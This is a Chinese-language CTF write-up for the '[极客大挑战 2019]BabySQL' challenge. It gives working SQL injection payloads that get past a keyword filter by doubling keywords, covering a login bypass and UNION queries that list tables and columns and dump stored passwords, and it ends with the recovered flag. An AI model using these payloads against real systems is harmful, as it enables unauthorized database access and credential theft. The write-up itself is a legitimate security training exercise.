极客大挑战-2019-BabySQL

[极客大挑战 2019]BabySQL

1.题目:
2.过程:

sql注入,含有一些过滤,测试一下:

image-20210215125923816

or被换掉了,应该可以双写绕过。#应该也被过滤了,本来想试试双写%23,但是%23好像就可以

?username=1&password=1’ oorr 1=1%23

image-20210215130642352

image-20210215130756896

?username=1&password=1’ ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=database()),3%23

image-20210215131300655

?username=1&password=1’ ununionion selselectect 1,(selselectect group_concat(column_name) frofromm infoorrmation_schema.columns whwhereere table_name=’b4bsql’),3%23

image-20210215131552872

这个or的替换真是处处可见……

?username=1&password=1’ ununionion selselectect 1,(selselectect group_concat(passwoorrd) frofromm b4bsql),3%23

image-20210215131936656

flag{539ec27d-80a6-4381-a837-805f1b9b406e}

得到flag……

作者

inanb

发布于

2021-02-15

更新于

2021-08-23

许可协议


:D 一言句子获取中...